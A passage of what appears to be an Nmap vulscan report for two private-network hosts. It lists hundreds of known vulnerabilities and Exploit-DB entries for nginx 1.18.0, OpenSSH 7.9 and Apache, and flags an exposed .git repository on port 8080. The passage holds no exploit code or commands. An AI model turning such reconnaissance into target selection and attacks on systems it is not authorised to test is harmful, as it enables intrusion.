Overflow Exploit (win2k3) [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit [9] Apache HTTP Server 2.x Memory Leak Exploit OpenVAS (Nessus) - http://www.openvas.org: [855524] Solaris Update for Apache 2 120544-14 [855077] Solaris Update for Apache 2 120543-14 [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability [72626] Debian Security Advisory DSA 2579-1 (apache2) [71551] Gentoo Security Advisory GLSA 201206-25 (apache) [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat) [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security) [71256] Debian Security Advisory DSA 2452-1 (apache2) [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid) [70724] Debian Security Advisory DSA 2405-1 (apache2) [70235] Debian Security Advisory DSA 2298-2 (apache2) [70233] Debian Security Advisory DSA 2298-1 (apache2) [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external) [69338] Debian Security Advisory DSA 2202-1 (apache2) [65131] SLES9: Security update for Apache 2 oes/CORE [64426] Gentoo Security Advisory GLSA 200907-04 (apache) [61381] Gentoo Security Advisory GLSA 200807-06 (apache) [60582] Gentoo Security Advisory GLSA 200803-19 (apache) [58745] Gentoo Security Advisory GLSA 200711-06 (apache) [57851] Gentoo Security Advisory GLSA 200608-01 (apache) [56246] Gentoo Security Advisory GLSA 200602-03 (Apache) [55392] Gentoo Security Advisory GLSA 200509-12 (Apache) [55129] Gentoo Security Advisory GLSA 200508-15 (apache) [54739] Gentoo Security Advisory GLSA 200411-18 (apache) [54724] Gentoo Security Advisory GLSA 200411-03 (apache) [54712] Gentoo Security Advisory GLSA 200410-21 (apache) [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache) [54677] Gentoo Security Advisory GLSA 200409-21 (apache) [54610] Gentoo Security Advisory GLSA 200407-03 (Apache) [54601] Gentoo Security Advisory GLSA 200406-16 (Apache) [54590] Gentoo Security Advisory GLSA 200406-05 (Apache) [54582] Gentoo Security Advisory GLSA 200405-22 (Apache) [54529] Gentoo Security Advisory GLSA 200403-04 (Apache) [54499] Gentoo Security Advisory GLSA 200310-04 (Apache) [54498] Gentoo Security Advisory GLSA 200310-03 (Apache) [11092] Apache 2.0.39 Win32 directory traversal [66081] SLES11: Security update for Apache 2 [66074] SLES10: Security update for Apache 2 [66070] SLES9: Security update for Apache 2 [65893] SLES10: Security update for Apache 2 [65888] SLES10: Security update for Apache 2 [65510] SLES9: Security update for Apache 2 [65249] SLES9: Security update for Apache 2 [65230] SLES9: Security update for Apache 2 [65228] SLES9: Security update for Apache 2 [65207] SLES9: Security update for Apache 2 [65136] SLES9: Security update for Apache 2 [65017] SLES9: Security update for Apache 2 SecurityTracker - https://www.securitytracker.com: [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users OSVDB - http://www.osvdb.org: [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
2222	tcp	closed	EtherNetIP-1	reset
6666	tcp	closed	irc	reset
8080	tcp	open	http	syn-ack	nginx	1.18.0	Ubuntu
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-server-header	nginx/1.18.0 (Ubuntu)
	vulscan	VulDB - https://vuldb.com: [155282] nginx up to 1.18.0 privilege escalation MITRE CVE - https://cve.mitre.org: [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028. [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file. [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request. [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow. [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request. [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response. SecurityFocus - https://www.securityfocus.com/bid/: [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability [90967] nginx CVE-2016-4450 Denial of Service Vulnerability [82230] nginx Multiple Denial of Service Vulnerabilities [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability [69111] nginx SMTP Proxy Remote Command Injection Vulnerability [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability [59824] Nginx CVE-2013-2070 Remote Security Vulnerability [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability [58105] Nginx 'access.log' Insecure File Permissions Vulnerability [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability [55920] nginx CVE-2011-4963 Security Bypass Vulnerability [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities [40434] nginx Space String Remote Source Code Disclosure Vulnerability [40420] nginx Directory Traversal Vulnerability [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions [84172] nginx denial of service [84048] nginx buffer overflow [83923] nginx ngx_http_close_connection() integer overflow [83688] nginx null byte code execution [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass [82319] nginx access.log information disclosure [80952] nginx SSL spoofing [77244] nginx and Microsoft Windows request security bypass [76778] Naxsi module for Nginx nx_extract.py directory traversal [74831] nginx ngx_http_mp4_module.c buffer overflow [74191] nginx ngx_cpystrn() information disclosure [74045] nginx header response information disclosure [71355] nginx ngx_resolver_copy() buffer overflow [59370] nginx characters denial of service [59369] nginx DATA source code disclosure [59047] nginx space source code disclosure [58966] nginx unspecified directory traversal [54025] nginx ngx_http_parse.c denial of service [53431] nginx WebDAV component directory traversal [53328] Nginx CRC-32 cached domain name spoofing [53250] Nginx ngx_http_parse_complex_uri() function code execution Exploit-DB - https://www.exploit-db.com: [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow [25499] nginx 1.3.9-1.4.0 DoS PoC OpenVAS (Nessus) - http://www.openvas.org: [66451] Fedora Core 11 FEDORA-2009-12782 (nginx) [66450] Fedora Core 10 FEDORA-2009-12775 (nginx) [66449] Fedora Core 12 FEDORA-2009-12750 (nginx) [64912] Fedora Core 10 FEDORA-2009-9652 (nginx) [64911] Fedora Core 11 FEDORA-2009-9630 (nginx) [64869] Debian Security Advisory DSA 1884-1 (nginx) SecurityTracker - https://www.securitytracker.com: [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents OSVDB - http://www.osvdb.org: [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow [92796] nginx ngx_http_close_connection Function Crafted r-&gt [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution [90518] nginx Log Directory Permission Weakness Local Information Disclosure [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS [65294] nginx on Windows Encoded Space Request Remote Source Disclosure [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [62617] nginx Internal DNS Cache Poisoning Weakness [61779] nginx HTTP Request Escape Sequence Terminal Command Injection [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write [58128] nginx ngx_http_parse_complex_uri() Function Underflow [44447] nginx (engine x) msie_refresh Directive Unspecified XSS [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal [44443] nginx (engine x) rtsig Method Signal Queue Overflow [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
	http-enum	/.git/HEAD: Git folder
	http-stored-xss	Couldn't find any stored XSS vulnerabilities.
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-git	192.168.2.222:8080/.git/ Git repository found! Repository description: Unnamed repository; edit this file 'description' to name the... Last commit message: proxy script config Remotes: git@github.com:GP10-2023/ARS_DM5.git

Misc Metrics (click to expand)

192.168.3.1(online)

Address

192.168.3.1 (ipv4)

Ports

The 996 ports scanned but not shown below are in state: filtered

996 ports replied with: no-response

Port		State (toggle closed [0] \| filtered [0])	Service	Reason	Product	Version	Extra info
22	tcp	open	ssh	syn-ack	OpenSSH	7.9	protocol 2.0
	vulscan	VulDB - https://vuldb.com: [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config privilege escalation [130370] OpenSSH 7.9 privilege escalation [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter privilege escalation [129007] OpenSSH 7.9 scp Client scp.c privilege escalation [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c Username information disclosure [123011] OpenSSH up to 7.7 auth2-gss.c information disclosure [112267] OpenSSH up to 7.3 sshd kex.c/packet.c denial of service [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open privilege escalation [94611] OpenSSH up to 7.3 Access Control privilege escalation [94610] OpenSSH up to 7.3 Shared Memory Manager memory corruption [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation [90671] OpenSSH up to 7.2 auth-passwd.c auth_password privilege escalation [90405] OpenSSH up to 7.2p2 sshd information disclosure [90404] OpenSSH up to 7.2p2 sshd information disclosure [90403] OpenSSH up to 7.2p2 sshd denial of service [89622] OpenSSH 7.2p2 Authentication Username information disclosure [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation [80656] OpenBSD OpenSSH 7.1 X11 Forwarding 7PK Security Features [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption MITRE CVE - https://cve.mitre.org: [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632. [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6. SecurityFocus - https://www.securityfocus.com/bid/: [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability [92210] OpenSSH CBC Padding Weak Encryption Security Weakness [92209] OpenSSH MAC Verification Security Bypass Vulnerability [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities [75990] OpenSSH Login Handling Security Bypass Weakness [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities [66459] OpenSSH Certificate Validation Security Bypass Vulnerability [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability [61286] OpenSSH Remote Denial of Service Vulnerability [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [45304] OpenSSH J-PAKE Security Bypass Vulnerability [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability [32319] OpenSSH CBC Mode Information Disclosure Vulnerability [30794] Red Hat OpenSSH Backdoor Vulnerability [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability [28531] OpenSSH ForceCommand Command Execution Weakness [28444] OpenSSH X Connections Session Hijacking Vulnerability [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability [20956] OpenSSH Privilege Separation Key Signature Weakness [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability [16892] OpenSSH Remote PAM Denial Of Service Vulnerability [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness [8677] Multiple Portable OpenSSH PAM Vulnerabilities [8628] OpenSSH Buffer Mismanagement Vulnerabilities [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness [6168] OpenSSH Visible Password Vulnerability [5374] OpenSSH Trojan Horse Vulnerability [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [4241] OpenSSH Channel Code Off-By-One Vulnerability [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability [2917] OpenSSH PAM Session Evasion Vulnerability [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability [2356] OpenSSH Private Key Authentication Check Vulnerability [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability [1334] OpenSSH UseLogin Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [83258] GSI-OpenSSH auth-pam.c security bypass [82781] OpenSSH time limit denial of service [82231] OpenSSH pam_ssh_agent_auth PAM code execution [74809] OpenSSH ssh_gssapi_parse_ename denial of service [72756] Debian openssh-server commands information disclosure [68339] OpenSSH pam_thread buffer overflow [67264] OpenSSH ssh-keysign unauthorized access [65910] OpenSSH remote_glob function denial of service [65163] OpenSSH certificate information disclosure [64387] OpenSSH J-PAKE security bypass [63337] Cisco Unified Videoconferencing OpenSSH weak security [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure [45202] OpenSSH signal handler denial of service [44747] RHEL OpenSSH backdoor [44280] OpenSSH PermitRootLogin information disclosure [44279] OpenSSH sshd weak security [44037] OpenSSH sshd SELinux role unauthorized access [43940] OpenSSH X11 forwarding information disclosure [41549] OpenSSH ForceCommand directive security bypass [41438] OpenSSH sshd session hijacking [40897] OpenSSH known_hosts weak security [40587] OpenSSH username weak security [37371] OpenSSH username data manipulation [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed [37112] RHSA update for OpenSSH signal handler race condition not installed [37107] RHSA update for OpenSSH identical block denial of service not installed [36637] OpenSSH X11 cookie privilege escalation [35167] OpenSSH packet.c newkeys[mode] denial of service [34490] OpenSSH OPIE information disclosure [33794] OpenSSH ChallengeResponseAuthentication information disclosure [32975] Apple Mac OS X OpenSSH denial of service [32387] RHSA-2006:0738 updates for openssh not installed [32359] RHSA-2006:0697 updates for openssh not installed [32230] RHSA-2006:0298 updates for openssh not installed [32132] RHSA-2006:0044 updates for openssh not installed [30120] OpenSSH privilege separation monitor authentication verification weakness [29255] OpenSSH GSSAPI user enumeration [29254] OpenSSH signal handler race condition [29158] OpenSSH identical block denial of service [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service [25116] OpenSSH OpenPAM denial of service [24305] OpenSSH SCP shell expansion command execution [22665] RHSA-2005:106 updates for openssh not installed [22117] OpenSSH GSSAPI allows elevated privileges [22115] OpenSSH GatewayPorts security bypass [20930] OpenSSH sshd.c LoginGraceTime denial of service [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service [17213] OpenSSH allows port bouncing attacks [16323] OpenSSH scp file overwrite [13797] OpenSSH PAM information leak [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack [13264] OpenSSH PAM code could allow an attacker to gain access [13215] OpenSSH buffer management errors could allow an attacker to execute code [13214] OpenSSH memory vulnerabilities [13191] OpenSSH large packet buffer overflow [12196] OpenSSH could allow an attacker to bypass login restrictions [11970] OpenSSH could allow an attacker to obtain valid administrative account [11902] OpenSSH PAM support enabled information leak [9803] OpenSSH &quot [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse [9307] OpenSSH is running on the system [9169] OpenSSH &quot [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database [8383] OpenSSH off-by-one error in channel code [7647] OpenSSH UseLogin option arbitrary code execution [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges [7179] OpenSSH source IP access control bypass [6757] OpenSSH &quot [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files [6084] OpenSSH 2.3.1 allows remote users to bypass authentication [5517] OpenSSH allows unauthorized access to resources [4646] OpenSSH UseLogin option allows remote users to execute commands as root Exploit-DB - https://www.exploit-db.com: [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2) [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1) [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth) [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh) [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool OpenVAS (Nessus) - http://www.openvas.org: [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability [900179] OpenSSH CBC Mode Information Disclosure Vulnerability [881183] CentOS Update for openssh CESA-2012:0884 centos6 [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386 [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386 [870763] RedHat Update for openssh RHSA-2012:0884-04 [870129] RedHat Update for openssh RHSA-2008:0855-01 [861813] Fedora Update for openssh FEDORA-2010-5429 [861319] Fedora Update for openssh FEDORA-2007-395 [861170] Fedora Update for openssh FEDORA-2007-394 [861012] Fedora Update for openssh FEDORA-2007-715 [840345] Ubuntu Update for openssh vulnerability USN-597-1 [840300] Ubuntu Update for openssh update USN-612-5 [840271] Ubuntu Update for openssh vulnerability USN-612-2 [840268] Ubuntu Update for openssh update USN-612-7 [840259] Ubuntu Update for openssh vulnerabilities USN-649-1 [840214] Ubuntu Update for openssh vulnerability USN-566-1 [831074] Mandriva Update for openssh MDVA-2010:162 (openssh) [830929] Mandriva Update for openssh MDVA-2010:090 (openssh) [830807] Mandriva Update for openssh MDVA-2010:026 (openssh) [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh) [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh) [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt) [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh) [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability [100584] OpenSSH X Connections Session Hijacking Vulnerability [100153] OpenSSH CBC Mode Information Disclosure Vulnerability [66170] CentOS Security Advisory CESA-2009:1470 (openssh) [65987] SLES10: Security update for OpenSSH [65819] SLES10: Security update for OpenSSH [65514] SLES9: Security update for OpenSSH [65513] SLES9: Security update for OpenSSH [65334] SLES9: Security update for OpenSSH [65248] SLES9: Security update for OpenSSH [65218] SLES9: Security update for OpenSSH [65169] SLES9: Security update for openssh,openssh-askpass [65126] SLES9: Security update for OpenSSH [65019] SLES9: Security update for OpenSSH [65015] SLES9: Security update for OpenSSH [64931] CentOS Security Advisory CESA-2009:1287 (openssh) [61639] Debian Security Advisory DSA 1638-1 (openssh) [61030] Debian Security Advisory DSA 1576-2 (openssh) [61029] Debian Security Advisory DSA 1576-1 (openssh) [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc) [60803] Gentoo Security Advisory GLSA 200804-03 (openssh) [60667] Slackware Advisory SSA:2008-095-01 openssh [59014] Slackware Advisory SSA:2007-255-01 openssh [58741] Gentoo Security Advisory GLSA 200711-02 (openssh) [57919] Gentoo Security Advisory GLSA 200611-06 (openssh) [57895] Gentoo Security Advisory GLSA 200609-17 (openssh) [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6)) [57492] Slackware Advisory SSA:2006-272-02 openssh [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5) [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc) [57470] FreeBSD Ports: openssh [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc) [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH) [56294] Slackware Advisory SSA:2006-045-06 openssh [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again [53788] Debian Security Advisory DSA 025-1 (openssh) [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc) [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc) [11343] OpenSSH Client Unauthorized Remote Forwarding [10954] OpenSSH AFS/Kerberos ticket/token passing [10883] OpenSSH Channel Code Off by 1 [10823] OpenSSH UseLogin Environment Variables SecurityTracker - https://www.securitytracker.com: [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases [1017756] Apple OpenSSH Key 